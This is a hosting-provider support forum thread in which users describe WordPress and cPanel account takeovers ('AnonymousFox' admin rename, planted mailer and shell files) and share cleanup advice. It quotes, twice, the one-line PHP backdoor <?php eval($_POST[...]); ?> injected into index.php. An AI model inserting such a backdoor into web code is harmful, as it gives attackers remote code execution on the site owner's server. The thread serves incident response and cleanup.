Jump to content

[Solved] Invalid Login


hdkw1996

Recommended Posts

Hi,

 

The same thing was start happening to me yersteday. I have a Wordpress site on Tommy and I couldn't login either cPanel or Wordpress administration.

 

After reset my password, I could login to cPanel. I checked Wordpress database and I discovered that the admin user login was renamed and password changed. These changes were not made from me, so I think the site was been hacked (and so my cPanel account).

 

I though this was only my problem, but a family member who has a Wordpress blog on HelioHost too, suffered the same problem. The Wordpress admin user was renamed to the same login as mine and access to cPanel was not possible. Then, we had to reset the cPanel password to fix it.

 

Seemingly the attack only affects to the passwords, not files and the database is in good state. Anyway, I plan to restore a full backup of the site to ensure that everything is good.

 

Anyone has the same problem?

 

Best Regards,

Link to comment
Share on other sites

same problem there, tried to open the cpanel, no luck,
i know the pass was correct so i didn't reset it,
few minutes later, i can't even try to login, and none of my websties loads, problem was the server blocking my ip for try too much,

now i reseted the cpanel password, and i can't login to WP, they also reseted the wordpress login, to username was changed to  "AnonymousFox"

what a shame, you have a shop and they can reset the paypal account to get the payments, and download all your clients data,


so what if you reset it back? they can still make it happen again if the bug is not patched
 

Edited by dream11
Link to comment
Share on other sites

Yes, the 'AnonymousFox' was the same administrator user rename as mine.

 

I have installed Wordfence on my Wordpress site. Thanks to the plugin I found out that an suspicious administrator login was made.

 

I have done and scan from Wordfence, and I have the Wordpress installation modified:

 

New file: wp-admin/2125719357.php

New file: wp-content/1205929475.php

New file: wp-admin/php.ini

Modified file: index.php

Link to comment
Share on other sites

and what are the changes made at php.ini and index.php ?

 

i can delete the other files, but dont know what changed were made on the ini and php,

 

the other two new fles, one is a password protected php mailer,

and the other one is crypted shell access,

 

this has been clearly made for phishing,

GNafsjr.png

Yes, the 'AnonymousFox' was the same administrator user rename as mine.

 

I have installed Wordfence on my Wordpress site. Thanks to the plugin I found out that an suspicious administrator login was made.

 

I have done and scan from Wordfence, and I have the Wordpress installation modified:

 

New file: wp-admin/2125719357.php

New file: wp-content/1205929475.php

New file: wp-admin/php.ini

Modified file: index.php

Edited by dream11
Link to comment
Share on other sites

In "index.php", remove this code at the start of file:

<?php eval($_POST['475454656']); ?>

The "php.ini" must be deleted because not belongs to Wordpress.

 

I think these are the only changes that were made, but the best solution is restore a recent full backup of site (files and database) if you have one.

 

Also, this don't prevent from the hack will happend again in the future, because it's neccesary to known where is the security hole...

 

.

Link to comment
Share on other sites

thanks,

to you looks like a wordpress hack or a server hack?

the fact they changed the cpanel scared me a bit, since they have access to do anything
 

In "index.php", remove this code at the start of file:

<?php eval($_POST['475454656']); ?>

The "php.ini" must be deleted because not belongs to Wordpress.

 

I think these are the only changes that were made, but the best solution is restore a recent full backup of site (files and database) if you have one.

 

Also, this don't prevent from the hack will happend again in the future, because it's neccesary to known where is the security hole...

 

.

Link to comment
Share on other sites

Wordpress is well known for severe security issues and is laughably easy to compromise, especially because it's usually not kept updated, and because it's extensions are usually also full of holes.

 

We recommend not using WP for these and many other reasons. It's a leading cause of hacked sites, high load suspensions, spam suspensions, and phishing bans here at heliohost. Finding another CMS is your best option.

 

If you really want to keep WP, delete your installation, reinstall using updated components, don't use dubious themes and extensions from random websites (many are actually disguised backwoods) and make sure you keep it updated going forward, Otherwise this issue is just going to come back.

 

Also, that leafmailer is a spambot (we usually ban accounts that have it, please get rid of that ASAP or you'll lose your account).

Link to comment
Share on other sites

Wordpress is well known for severe security issues and is laughably easy to compromise, especially because it's usually not kept updated, and because it's extensions are usually also full of holes.

 

We recommend not using WP for these and many other reasons. It's a leading cause of hacked sites, high load suspensions, spam suspensions, and phishing bans here at heliohost. Finding another CMS is your best option.

 

If you really want to keep WP, delete your installation, reinstall using updated components, don't use dubious themes and extensions from random websites (many are actually disguised backwoods) and make sure you keep it updated going forward, Otherwise this issue is just going to come back.

 

Also, that leafmailer is a spambot (we usually ban accounts that have it, please get rid of that ASAP or you'll lose your account).

 

unblock ip please - https://www.helionet.org/index/topic/33546-unblock-ip/

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...